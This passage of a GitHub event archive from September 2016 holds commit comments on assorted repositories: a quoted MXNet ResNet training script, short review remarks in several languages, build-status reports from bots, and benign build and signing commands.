symbol = memonger.search_plan(symbol, data=data_shape)\r\n    devs = [mx.gpu(int(i)) for i in args.gpus.split(',')]\r\n    epoch_size = max(int(args.num_examples / args.batch_size / kv.num_workers), 1)\r\n    begin_epoch = args.model_load_epoch if args.load_epoch else 0\r\n    lr_scheduler = multi_factor_scheduler(\r\n        begin_epoch, epoch_size,\r\n        [int(l) for l in args.lr_steps.split(',')], args.lr_factor)\r\n    model = mx.model.FeedForward(\r\n        ctx                 = devs,\r\n        symbol              = symbol,\r\n        arg_params          = arg_params,\r\n        aux_params          = aux_params,\r\n        num_epoch           = args.num_epochs,\r\n        begin_epoch         = begin_epoch,\r\n        learning_rate       = args.lr,\r\n        momentum            = args.mom,\r\n        wd                  = args.wd,\r\n        lr_scheduler        = lr_scheduler,\r\n        optimizer           = 'nag',\r\n        # optimizer          = 'sgd',\r\n        initializer         = mx.init.Xavier(rnd_type='gaussian', factor_type=\"in\", magnitude=2),\r\n        )\r\n    train, val = get_iterator(args, kv)\r\n    model.fit(\r\n        X                  = train,\r\n        eval_data          = val,\r\n        eval_metric        = ['acc', mx.metric.create('top_k_accuracy', top_k = 5)],\r\n        kvstore            = kv,\r\n        batch_end_callback = mx.callback.Speedometer(args.batch_size, 10),\r\n        epoch_end_callback = checkpoint)\r\n\r\nif __name__ == \"__main__\":\r\n    parser = argparse.ArgumentParser(description=\"command for training resnet-v2\")\r\n    parser.add_argument('--mxnet-path', default=None,\r\n                        help='the mxnet to use')\r\n    data = parser.add_argument_group('data', 'input data')\r\n    data.add_argument('--data-train', type=str,\r\n                      help='the training data')\r\n    data.add_argument('--data-val', type=str,\r\n                      help='the validation data')\r\n    data.add_argument('--data-shape', type=int, default=224,\r\n                      help='input data shape')\r\n    data.add_argument('--num-classes', type=int,\r\n                      help='number of classes')\r\n    data.add_argument('--num-examples', type=int,\r\n                      help='number of training examples')\r\n    data.add_argument('--random-h', type=int, default=36,\r\n                      help='default is 0.4*90')\r\n    data.add_argument('--random-s', type=int, default=50,\r\n                      help='default is 0.4*127')\r\n    data.add_argument('--random-l', type=int, default=50,\r\n                      help='default is 0.4*127')\r\n    data.add_argument('--max-aspect-ratio', type=float, default=0.25,\r\n                      help='max angle to rotate')\r\n    data.add_argument('--max-rotate-angle', type=int, default=10,\r\n                      help='max angle to rotate')\r\n    data.add_argument('--max-shear-ratio', type=float, default=.1,\r\n                      help='max ratio to shear')\r\n    data.add_argument('--min-random-scale', type=float, default=1,\r\n                      help='mininal ratio for random scale, should >= input_img_size/data_shape')\r\n\r\n\r\n    model = parser.add_argument_group('model', 'resnet model')\r\n    model.add_argument('--depth', type=int,\r\n                       help='resnet depth')\r\n    model.add_argument('--filters', type=str, default='64,256,512,1024,2048',\r\n                       help='conv filter sizes')\r\n\r\n    train = parser.add_argument_group('train', 'model training')\r\n    train.add_argument('--gpus', type=str, default='0,1',\r\n                       help='gpus to run')\r\n    train.add_argument('--kv-store', type=str, default='device',\r\n                       help='key-value store type')\r\n    train.add_argument('--num-epochs', type=int, default=100,\r\n                       help='max num of epochs')\r\n    train.add_argument('--lr', type=float, default=0.1,\r\n                       help='initialization learning reate')\r\n    train.add_argument('--lr-factor', type=float, default=0.1,\r\n                       help='the ratio to reduce lr on each step')\r\n    train.add_argument('--lr-steps', type=str, default='30,60,90',\r\n                       help='the epochs to reduce the lrt')\r\n    train.add_argument('--mom', type=float, default=0.9,\r\n                       help='momentum for sgd')\r\n    train.add_argument('--bn-mom', type=float, default=0.9,\r\n                       help='momentum for batch normlization')\r\n    train.add_argument('--wd', type=float, default=0.0001,\r\n                       help='weight decay for sgd')\r\n    train.add_argument('--batch-size', type=int, default=256,\r\n                       help='the batch size')\r\n    train.add_argument('--workspace', type=int, default=256,\r\n                       help='memory space size(MB) used in convolution, if cpu '\r\n                        ' memory is oom, then you can try smaller vale, such as --workspace 256')\r\n    train.add_argument('--model-prefix', type=str,\r\n                        help='model prefix')\r\n    train.add_argument('--load-epoch', type=int, default=0,\r\n                        help='load the model on an epoch using the model-load-prefix')\r\n    train.add_argument('--memonger', action='store_true', default=False,\r\n                        help='true means using memonger to save momory, default is false')\r\n    train.add_argument('--retrain', action='store_true', default=False,\r\n                       help='true means continue training, default is false')\r\n\r\n    args = parser.parse_args()\r\n\r\n    if args.mxnet_path is not None:\r\n        import sys\r\n        curr_path = os.path.abspath(os.path.dirname(__file__))\r\n        sys.path.insert(0, os.path.join(curr_path, args.mxnet_path+'/python'))\r\n\r\n    import mxnet as mx\r\n    fit(args)\r\n```\r\n\r\nbut i suggest to merge back into `mxnet/example/image-classification` when you think it is ready. you can also change the latter to fit resnet. "}},"created_at":"2016-09-23T05:24:34Z"}
{"id":"4606651716","type":"CommitCommentEvent","actor":{"login":"McSimp"},"repo":{"name":"Mensoncoon/FYP_Hexabot_ATSAM_S70"},"payload":{"comment":{"id":19141054,"position":null,"line":null,"path":null,"commit_id":"14f1d79263b846d4807726712455ecd6fe7e87f2","created_at":"2016-09-23T05:25:49Z","updated_at":"2016-09-23T05:25:49Z","body":"Calm down mate"}},"created_at":"2016-09-23T05:25:49Z"}
{"id":"4606652175","type":"CommitCommentEvent","actor":{"login":"JamieCuffe"},"repo":{"name":"JamieCuffe/personalWebsite"},"payload":{"comment":{"id":19141056,"position":null,"line":null,"path":null,"commit_id":"8ebee49c81cd39b7c39028d04df58836438d57c7","created_at":"2016-09-23T05:26:00Z","updated_at":"2016-09-23T05:26:00Z","body":"*Notice"}},"created_at":"2016-09-23T05:26:00Z"}
{"id":"4606653697","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"sisl/BayesNets.jl"},"payload":{"comment":{"id":19141061,"position":14,"line":53,"path":"src/io.jl","commit_id":"35fda5b5baffc58c48e015a4f311b770c75ec8ef","created_at":"2016-09-23T05:26:39Z","updated_at":"2016-09-23T05:26:39Z","body":"adding an `import Compat.String` should fix it, I think"}},"created_at":"2016-09-23T05:26:39Z"}
{"id":"4606654008","type":"CommitCommentEvent","actor":{"login":"raven02"},"repo":{"name":"kd-11/rpcs3"},"payload":{"comment":{"id":19141062,"position":null,"line":null,"path":null,"commit_id":"8c730029b386de3c30901ac54f566efe7b524e98","created_at":"2016-09-23T05:26:47Z","updated_at":"2016-09-23T05:26:47Z","body":"@kd-11 Do we need vec4 for rsq_legacy below?\r\n\r\n\r\n\tOS << \"vec4 rsq_legacy(vec4 val)\\n\";\r\n\tOS << \"{\\n\";\r\n\tOS << \"\treturn float(1.0 / sqrt(max(val.x, 1.E-10))).xxxx;\\n\";\r\n\tOS << \"}\\n\\n\";"}},"created_at":"2016-09-23T05:26:47Z"}
{"id":"4606655402","type":"CommitCommentEvent","actor":{"login":"Daehan91"},"repo":{"name":"BromsMatulak/IoT-KNU-20162-Team16"},"payload":{"comment":{"id":19141068,"position":null,"line":null,"path":null,"commit_id":"340f616a7c9b5c69af2e68e8ef813f9cef1bb4fd","created_at":"2016-09-23T05:27:25Z","updated_at":"2016-09-23T05:27:25Z","body":"HW01_16조_2011104196_위대한"}},"created_at":"2016-09-23T05:27:25Z"}
{"id":"4606659781","type":"CommitCommentEvent","actor":{"login":"TroyBug"},"repo":{"name":"TroyBug/TroyBug.github.io"},"payload":{"comment":{"id":19141086,"position":null,"line":null,"path":null,"commit_id":"e91a532f0f3b7839721f83e2708270178e3e4cee","created_at":"2016-09-23T05:29:23Z","updated_at":"2016-09-23T05:29:23Z","body":"run this html file in chrome"}},"created_at":"2016-09-23T05:29:23Z"}
{"id":"4606662799","type":"CommitCommentEvent","actor":{"login":"sagarvi-dev"},"repo":{"name":"sagarvi-dev/Instamag"},"payload":{"comment":{"id":19141095,"position":3,"line":52,"path":"app/controllers/posts_controller.rb","commit_id":"aa5673c6bf4698edc9fce3f4158766f78d14baa4","created_at":"2016-09-23T05:30:34Z","updated_at":"2016-09-23T05:30:34Z","body":"zxccxz"}},"created_at":"2016-09-23T05:30:34Z"}
{"id":"4606662964","type":"CommitCommentEvent","actor":{"login":"sagarvi-dev"},"repo":{"name":"sagarvi-dev/Instamag"},"payload":{"comment":{"id":19141097,"position":2,"line":2,"path":"app/controllers/application_controller.rb","commit_id":"aa5673c6bf4698edc9fce3f4158766f78d14baa4","created_at":"2016-09-23T05:30:39Z","updated_at":"2016-09-23T05:30:39Z","body":"xzc"}},"created_at":"2016-09-23T05:30:39Z"}
{"id":"4606663197","type":"CommitCommentEvent","actor":{"login":"sagarvi-dev"},"repo":{"name":"sagarvi-dev/Instamag"},"payload":{"comment":{"id":19141098,"position":1,"line":50,"path":"app/controllers/posts_controller.rb","commit_id":"aa5673c6bf4698edc9fce3f4158766f78d14baa4","created_at":"2016-09-23T05:30:45Z","updated_at":"2016-09-23T05:30:45Z","body":"xcz"}},"created_at":"2016-09-23T05:30:45Z"}
{"id":"4606663619","type":"CommitCommentEvent","actor":{"login":"sagarvi-dev"},"repo":{"name":"sagarvi-dev/Instamag"},"payload":{"comment":{"id":19141099,"position":2,"line":2,"path":"app/controllers/application_controller.rb","commit_id":"aa5673c6bf4698edc9fce3f4158766f78d14baa4","created_at":"2016-09-23T05:30:55Z","updated_at":"2016-09-23T05:30:55Z","body":"xzzxx"}},"created_at":"2016-09-23T05:30:55Z"}
{"id":"4606664213","type":"CommitCommentEvent","actor":{"login":"f-stibane"},"repo":{"name":"f-stibane/hdp-cluster-docker"},"payload":{"comment":{"id":19141100,"position":null,"line":null,"path":null,"commit_id":"5333784101d12d1d500cc1307dee0ead0464108a","created_at":"2016-09-23T05:31:10Z","updated_at":"2016-09-23T05:31:10Z","body":"Yo, bitte die letzten beiden Commits hier auf dem Branch squashen und dann auf den master spielen! GJ :D"}},"created_at":"2016-09-23T05:31:10Z"}
{"id":"4606665659","type":"CommitCommentEvent","actor":{"login":"supermitch"},"repo":{"name":"supermitch/runblueprint.com"},"payload":{"comment":{"id":19141102,"position":null,"line":null,"path":null,"commit_id":"f975b9a04e4874b13a033f23078e726e97a08415","created_at":"2016-09-23T05:31:49Z","updated_at":"2016-09-23T05:31:49Z","body":"If you don't like 2 digits I'd prefer to see 1 decimal than none. You could potentially add 3.5 km to a week? But you're right 2 was too much."}},"created_at":"2016-09-23T05:31:49Z"}
{"id":"4606667413","type":"CommitCommentEvent","actor":{"login":"f-stibane"},"repo":{"name":"f-stibane/hdp-cluster-docker"},"payload":{"comment":{"id":19141106,"position":null,"line":null,"path":null,"commit_id":"5333784101d12d1d500cc1307dee0ead0464108a","created_at":"2016-09-23T05:32:34Z","updated_at":"2016-09-23T05:32:34Z","body":"Ah, das 2. check-database kannst du rausnehmen oder?\r\n->\r\nCMD service postgresql start && while ! ambari-server check-database; do sleep 2; done && ambari-server start && tail -f /var/log/ambari-server/ambari-server.log\r\n"}},"created_at":"2016-09-23T05:32:34Z"}
{"id":"4606668279","type":"CommitCommentEvent","actor":{"login":"jan-kiszka"},"repo":{"name":"WhisperSystems/Signal-Android"},"payload":{"comment":{"id":19141108,"position":null,"line":null,"path":null,"commit_id":"3bec127020ca9d63f0964672adfc90d5753d3a90","created_at":"2016-09-23T05:32:59Z","updated_at":"2016-09-23T05:32:59Z","body":"@rleonhardt I'm self-signing my builds, that's required:\r\n```\r\njarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore /path/to/my/keystore build/outputs/apk/Signal-Android-release-unsigned.apk app-sign\r\n```\r\nI don't have a how-to for generating that key ATM, but I'm sure you'll find one on the net."}},"created_at":"2016-09-23T05:32:59Z"}
{"id":"4606668757","type":"CommitCommentEvent","actor":{"login":"larshp"},"repo":{"name":"sbcgua/abapGit"},"payload":{"comment":{"id":19141109,"position":null,"line":null,"path":null,"commit_id":"9ccff2690f6ad1c26f4d0e36510304991d238c3f","created_at":"2016-09-23T05:33:11Z","updated_at":"2016-09-23T05:33:11Z","body":"additionally\r\n\r\nI imagined a 'Advanced -> Debug Information' page, we can also put `gc_xml_version` there"}},"created_at":"2016-09-23T05:33:11Z"}
{"id":"4606672596","type":"CommitCommentEvent","actor":{"login":"marhyorh"},"repo":{"name":"marhyorh/FreeCodeCamp"},"payload":{"comment":{"id":19141116,"position":null,"line":null,"path":null,"commit_id":"2a3cdb0ee5449206b6aa208c37bde1ea5b4321b0","created_at":"2016-09-23T05:34:52Z","updated_at":"2016-09-23T05:34:52Z","body":"I don't know why that was changed to settings. On your first image, the nav drops down without the logo, is that how its meant to be??"}},"created_at":"2016-09-23T05:34:52Z"}
{"id":"4606675127","type":"CommitCommentEvent","actor":{"login":"bogdanpetru"},"repo":{"name":"radubrehar/react-window"},"payload":{"comment":{"id":19141128,"position":5,"line":793,"path":"src/index.jsx","commit_id":"1b2993175d8d603c4b3624e0f8b462df33bd98d4","created_at":"2016-09-23T05:35:55Z","updated_at":"2016-09-23T05:35:55Z","body":"@radubrehar haha, I was looking for this bug"}},"created_at":"2016-09-23T05:35:55Z"}
{"id":"4606676597","type":"CommitCommentEvent","actor":{"login":"amilner42"},"repo":{"name":"amilner42/mea2n-kickstarter"},"payload":{"comment":{"id":19141133,"position":166,"line":167,"path":"frontend/src/app/welcome/welcome.component.ts","commit_id":"8b60622b176e6a3c6f757c24683df10e9c601579","created_at":"2016-09-23T05:36:34Z","updated_at":"2016-09-23T05:36:34Z","body":"Ya I agree my way is ugly as hell...wanted to improve it but wasn't sure how.\r\n\r\nWith your method above would I change all of this:\r\n```\r\n // The model\r\n private email: string;\r\n private password: string;\r\n private confirmPassword: string;\r\n \r\n // The placeholders, change during errors.\r\n private loginEmailPlaceholder: string;\r\n private loginPasswordPlaceholder: string;\r\n private registerEmailPlaceholder: string;\r\n private registerPasswordPlaceholder: string;\r\n private registerConfirmPasswordPlaceholder: string;\r\n \r\n // True if there is an error in that input.\r\n private loginEmailError: boolean;\r\n private loginPasswordError: boolean;\r\n private registerEmailError: boolean;\r\n private registerPasswordError: boolean;\r\n private registerConfirmPasswordError: boolean;\r\n```\r\nInto a single JSON object (I guess called `state`), and then have the errorCode object properties update `state`?"}},"created_at":"2016-09-23T05:36:34Z"}
{"id":"4606681912","type":"CommitCommentEvent","actor":{"login":"212450444"},"repo":{"name":"212450444/java-buildpack"},"payload":{"comment":{"id":19141140,"position":null,"line":null,"path":null,"commit_id":"b106841a1b5a2e43691262550f0d2fc9271ac9f2","created_at":"2016-09-23T05:38:54Z","updated_at":"2016-09-23T05:38:54Z","body":"Working version"}},"created_at":"2016-09-23T05:38:54Z"}
{"id":"4606685047","type":"CommitCommentEvent","actor":{"login":"Shivijais"},"repo":{"name":"highcharts/highcharts"},"payload":{"comment":{"id":19141147,"position":null,"line":null,"path":null,"commit_id":"643d9ef572d993ee626de7d28c27b7e03dfb8d07","created_at":"2016-09-23T05:40:17Z","updated_at":"2016-09-23T05:40:17Z","body":"Any idea when will this change be published to the official highcharts repo?"}},"created_at":"2016-09-23T05:40:17Z"}
{"id":"4606694903","type":"CommitCommentEvent","actor":{"login":"mumbi"},"repo":{"name":"mumbi/class"},"payload":{"comment":{"id":19141173,"position":1,"line":1,"path":"README.md","commit_id":"c1c51caf9dbb16ca283662b8ce342346a5dcffc0","created_at":"2016-09-23T05:44:27Z","updated_at":"2016-09-23T05:44:27Z","body":"what the hell"}},"created_at":"2016-09-23T05:44:27Z"}
{"id":"4606697543","type":"CommitCommentEvent","actor":{"login":"bjfish"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19141182,"position":4,"line":250,"path":"truffle/src/main/ruby/core/file.rb","commit_id":"37852c015c39c1920f7ba57c04f70b3334b67e95","created_at":"2016-09-23T05:45:33Z","updated_at":"2016-09-23T05:45:33Z","body":"@headius Regarding `HAVE_LCHMOD` Is there a way to use `jnr-posix` to tell if a platform defines a function (before calling it)? Or is this something that should be added to `jnr-posix`? Thanks.\r\n\r\ncc: @nirvdrum "}},"created_at":"2016-09-23T05:45:33Z"}
{"id":"4606698210","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19141186,"position":null,"line":null,"path":null,"commit_id":"a1722b22406de1fc587bc25e5940d4ac10f2089a","created_at":"2016-09-23T05:45:48Z","updated_at":"2016-09-23T05:45:48Z","body":"Sizing-Simple-Chilled-Ceiling (Myoldmopar) - Win64-Windows-7-VisualStudio-12: OK (2342 of 2345 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: ERR diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1722b22406de1fc587bc25e5940d4ac10f2089a-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1722b22406de1fc587bc25e5940d4ac10f2089a-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-23T05:45:48Z"}
{"id":"4606700773","type":"CommitCommentEvent","actor":{"login":"r-a-y"},"repo":{"name":"r-a-y/bp-reply-by-email"},"payload":{"comment":{"id":19141193,"position":null,"line":null,"path":null,"commit_id":"f7831e899e8cd0b7932e1b82aeec398c73c11f58","created_at":"2016-09-23T05:46:50Z","updated_at":"2016-09-23T05:46:50Z","body":"Forgot to write in the commit message that this is for the older `wp_mail()` system and for those using PHPMailer with `wp_mail()`.\r\n\r\nCommit f297579 handles the newer BP 2.5 email API."}},"created_at":"2016-09-23T05:46:50Z"}
{"id":"4606706845","type":"CommitCommentEvent","actor":{"login":"hchiorean"},"repo":{"name":"ModeShape/modeshape"},"payload":{"comment":{"id":19141232,"position":17,"line":82,"path":"modeshape-jcr/src/main/java/org/modeshape/jcr/ModeShapeFederationManager.java","commit_id":"48654be2566842dd267debeec10e1531e4d33cc8","created_at":"2016-09-23T05:49:21Z","updated_at":"2016-09-23T05:49:21Z","body":"we should switch order here and call `system.Session.save(sessionCache, null)` to make sure that the system area and cache is updated first"}},"created_at":"2016-09-23T05:49:21Z"}
{"id":"4606707207","type":"CommitCommentEvent","actor":{"login":"alittlecow"},"repo":{"name":"alittlecow/beautiful-china"},"payload":{"comment":{"id":19141236,"position":null,"line":null,"path":null,"commit_id":"16ff4c7ac3c74b53bb8fe0b0203702b180b27ecc","created_at":"2016-09-23T05:49:30Z","updated_at":"2016-09-23T05:49:30Z","body":"11111"}},"created_at":"2016-09-23T05:49:30Z"}
{"id":"4606709078","type":"CommitCommentEvent","actor":{"login":"thekeenant"},"repo":{"name":"Avicus/Tutorial"},"payload":{"comment":{"id":19141241,"position":null,"line":null,"path":null,"commit_id":"38a151462aba59505b813af1312a3bb9e2fffa49","created_at":"2016-09-23T05:50:18Z","updated_at":"2016-09-23T05:50:18Z","body":"I didn't add this intentionally because it won't work in atlas."}},"created_at":"2016-09-23T05:50:18Z"}
{"id":"4606716300","type":"CommitCommentEvent","actor":{"login":"sandipagarwal"},"repo":{"name":"sebdah/git-pylint-commit-hook"},"payload":{"comment":{"id":19141262,"position":null,"line":null,"path":null,"commit_id":"d82fb72191ecf06e3189c4ce5083d18a7771abad","created_at":"2016-09-23T05:53:07Z","updated_at":"2016-09-23T05:53:07Z","body":"@lagelalegal I think when we are checking the existence of the index.lock, a file index.lock has been created for the commit command that we have fired and after which the pre-commit hooks start. \r\n\r\nMoreover, I rechecked my repo as per what you suggested and I didn't find the index.lock in my repo. But, on running the commit hook, (I inserted the exists command in the code), I found the file to exist. And, this goes by what I just explained in the above para.\r\n\r\n![screen shot 2016-09-23 at 11 13 08 am](https://cloud.githubusercontent.com/assets/988003/18775513/f89789e8-817f-11e6-932a-6a86e528c53f.png)\r\n"}},"created_at":"2016-09-23T05:53:07Z"}
{"id":"4606720256","type":"CommitCommentEvent","actor":{"login":"PatrickTrentin88"},"repo":{"name":"LucaGaspa/mzn2omt"},"payload":{"comment":{"id":19141272,"position":12,"line":27,"path":"src/setExpr.cpp","commit_id":"057cc81a5be3b16fb8a72d23cc6826046c251ecb","created_at":"2016-09-23T05:54:39Z","updated_at":"2016-09-23T05:54:39Z","body":"cancella pure ;)"}},"created_at":"2016-09-23T05:54:39Z"}
{"id":"4606720806","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19141273,"position":null,"line":null,"path":null,"commit_id":"feee1db581a852e034f50474f310c6e458303e09","created_at":"2016-09-23T05:54:53Z","updated_at":"2016-09-23T05:54:53Z","body":"develop (mjwitte) - i386-Windows-7-VisualStudio-12: OK (1772 of 1772 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feee1db581a852e034f50474f310c6e458303e09-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feee1db581a852e034f50474f310c6e458303e09-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-23T05:54:53Z"}
{"id":"4606722814","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19141277,"position":18,"line":314,"path":"ryu/lib/stplib.py","commit_id":"0fbbfda834cf742a9aa3650a8b3609ee8bc21fc8","created_at":"2016-09-23T05:55:40Z","updated_at":"2016-09-23T05:55:40Z","body":"port_stateの変更については上記修正でよいと思いますが、\r\nその前のif/elifにてport_state追加、削除に対応できていませんでした。\r\nBridgeクラスのport_addおよびport_deleteにて対象となるポート番号の情報を削除する様に修正します。\r\nまた、その旨をコメントに追記します。\r\n\r\nポートのステータス更新およびポートの追加についてはRyu-bookにある動作のみでルートを通せていましたが、ポート削除のルートは通せないため、mininetを停止させることでポート削除ルートを確認しました。\r\nryu/tests/unit/lib配下にstplib用の試験ファイルが存在していないのですが、mininetを使用しなければ実現が難しいためなのでしょうか？\r\nryu/tests配下でstplibをimportしているファイルが見つかりませんでしたので、上記のようにmininet側の操作により動作確認を行いました。"}},"created_at":"2016-09-23T05:55:40Z"}
{"id":"4606723540","type":"CommitCommentEvent","actor":{"login":"xialang2012"},"repo":{"name":"sweeneychris/TheiaSfM"},"payload":{"comment":{"id":19141280,"position":12,"line":51,"path":"src/theia/util/random.cc","commit_id":"1c9c75b45ea247aa271812fb2bdae0f613d49561","created_at":"2016-09-23T05:56:00Z","updated_at":"2016-09-23T05:56:00Z","body":"remove #endif"}},"created_at":"2016-09-23T05:56:00Z"}
{"id":"4606728333","type":"CommitCommentEvent","actor":{"login":"supermitch"},"repo":{"name":"supermitch/runblueprint.com"},"payload":{"comment":{"id":19141293,"position":null,"line":null,"path":null,"commit_id":"c5c72f1ec9414afcc703b3e92836b23b0a587aec","created_at":"2016-09-23T05:58:05Z","updated_at":"2016-09-23T05:58:05Z","body":"Imports are screwy possibly because of the way Django is running. Normally you would not have to use .prototypes. Will dig into this some more. Is an area I need more understanding of. We should be using absolute imports: http://stackoverflow.com/questions/4209641/absolute-vs-explicit-relative-import-of-python-module"}},"created_at":"2016-09-23T05:58:05Z"}
{"id":"4606729261","type":"CommitCommentEvent","actor":{"login":"Futochu"},"repo":{"name":"UBCMJC/MJCApp"},"payload":{"comment":{"id":19141294,"position":null,"line":null,"path":null,"commit_id":"bf87082d268b0255d8d3158ed86dca2e8cf7976b","created_at":"2016-09-23T05:58:29Z","updated_at":"2016-09-23T05:58:29Z","body":"This is not enough change change more!"}},"created_at":"2016-09-23T05:58:29Z"}
{"id":"4606730244","type":"CommitCommentEvent","actor":{"login":"longyu1987"},"repo":{"name":"longyu1987/USB_verify_driver"},"payload":{"comment":{"id":19141297,"position":null,"line":null,"path":null,"commit_id":"3723a8c164e6c6aaddd22757d2ad6273c2184168","created_at":"2016-09-23T05:58:51Z","updated_at":"2016-09-23T05:58:51Z","body":"there is some errors for modify code"}},"created_at":"2016-09-23T05:58:51Z"}
{"id":"4606732080","type":"CommitCommentEvent","actor":{"login":"buiake"},"repo":{"name":"buiake/CC2640-loader"},"payload":{"comment":{"id":19141298,"position":null,"line":null,"path":null,"commit_id":"48dde776962e06e37677f35452f6ada02fad0296","created_at":"2016-09-23T05:59:34Z","updated_at":"2016-09-23T05:59:34Z","body":"Rev 0.0"}},"created_at":"2016-09-23T05:59:34Z"}
{"id":"4606732450","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19141300,"position":null,"line":null,"path":null,"commit_id":"f9ee4e2dab3258696770f6d786adbb508632df85","created_at":"2016-09-23T05:59:42Z","updated_at":"2016-09-23T05:59:42Z","body":"Also see [issue 302: AES and incorrect argument to _freea() under Microsoft compilers](http://github.com/weidai11/cryptopp/issues/302)."}},"created_at":"2016-09-23T05:59:42Z"}
{"id":"4606732482","type":"CommitCommentEvent","actor":{"login":"Darurium"},"repo":{"name":"Darurium/2_wallie_how_are_you"},"payload":{"comment":{"id":19141301,"position":4,"line":20,"path":"wallie.py","commit_id":"a11a2b2f5e5ae4c49464adf3912588c24aafe218","created_at":"2016-09-23T05:59:43Z","updated_at":"2016-09-23T05:59:43Z","body":"Разбирался с GitBash, что-то натворил)"}},"created_at":"2016-09-23T05:59:43Z"}
{"id":"4606733331","type":"CommitCommentEvent","actor":{"login":"GoodERPJeff"},"repo":{"name":"osbzr/gooderp_addons"},"payload":{"comment":{"id":19141302,"position":null,"line":null,"path":null,"commit_id":"15e266a85615c433b2ce46f659925b317a010304","created_at":"2016-09-23T06:00:00Z","updated_at":"2016-09-23T06:00:00Z","body":"cloase #623"}},"created_at":"2016-09-23T06:00:00Z"}
{"id":"4606734919","type":"CommitCommentEvent","actor":{"login":"EdmondFrank"},"repo":{"name":"EdmondFrank/Esurfing"},"payload":{"comment":{"id":19141320,"position":null,"line":null,"path":null,"commit_id":"7b9eb13f361b83f23a354ca43e0867abad19b24d","created_at":"2016-09-23T06:00:31Z","updated_at":"2016-09-23T06:00:31Z","body":"@Beloya 确定是校园网相关算法更新么？我在校园网的网页上倒是没看见相关通知。但目前可以确定的是，我仍可正常登录。"}},"created_at":"2016-09-23T06:00:31Z"}
{"id":"4606736409","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19141333,"position":null,"line":null,"path":null,"commit_id":"8de59e147d2991819907eefc7fe9c72fbb0cfe6a","created_at":"2016-09-23T06:01:04Z","updated_at":"2016-09-23T06:01:04Z","body":"os_2_0_fix_static_build (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8de59e147d2991819907eefc7fe9c72fbb0cfe6a-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8de59e147d2991819907eefc7fe9c72fbb0cfe6a-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-23T06:01:04Z"}
{"id":"4606736416","type":"CommitCommentEvent","actor":{"login":"DeepAQ"},"repo":{"name":"TitaniumQuartet/HotelProject"},"payload":{"comment":{"id":19141334,"position":null,"line":null,"path":null,"commit_id":"fdacf27ccad5b31b7af0a852bec95956b0c8ae79","created_at":"2016-09-23T06:01:05Z","updated_at":"2016-09-23T06:01:05Z","body":"膜大佬，我在午睡的时候，大佬在超越"}},"created_at":"2016-09-23T06:01:05Z"}
{"id":"4606742149","type":"CommitCommentEvent","actor":{"login":"parthpandya17"},"repo":{"name":"parthpandya17/273-Homework1"},"payload":{"comment":{"id":19141357,"position":4,"line":117,"path":"Homework1/workspace/CreditCard/routes/validate.js","commit_id":"76baf2a8a3f2a2a4adadf9bedbdcc242ec3e8ea3","created_at":"2016-09-23T06:03:13Z","updated_at":"2016-09-23T06:03:13Z","body":"approved"}},"created_at":"2016-09-23T06:03:13Z"}
{"id":"4606742587","type":"CommitCommentEvent","actor":{"login":"parthpandya17"},"repo":{"name":"parthpandya17/273-Homework1"},"payload":{"comment":{"id":19141359,"position":5,"line":118,"path":"Homework1/workspace/CreditCard/routes/validate.js","commit_id":"76baf2a8a3f2a2a4adadf9bedbdcc242ec3e8ea3","created_at":"2016-09-23T06:03:24Z","updated_at":"2016-09-23T06:03:24Z","body":"approved"}},"created_at":"2016-09-23T06:03:24Z"}
{"id":"4606743596","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19141362,"position":null,"line":null,"path":null,"commit_id":"feee1db581a852e034f50474f310c6e458303e09","created_at":"2016-09-23T06:03:48Z","updated_at":"2016-09-23T06:03:48Z","body":"develop (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (1772 of 1772 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feee1db581a852e034f50474f310c6e458303e09-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feee1db581a852e034f50474f310c6e458303e09-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-23T06:03:48Z"}
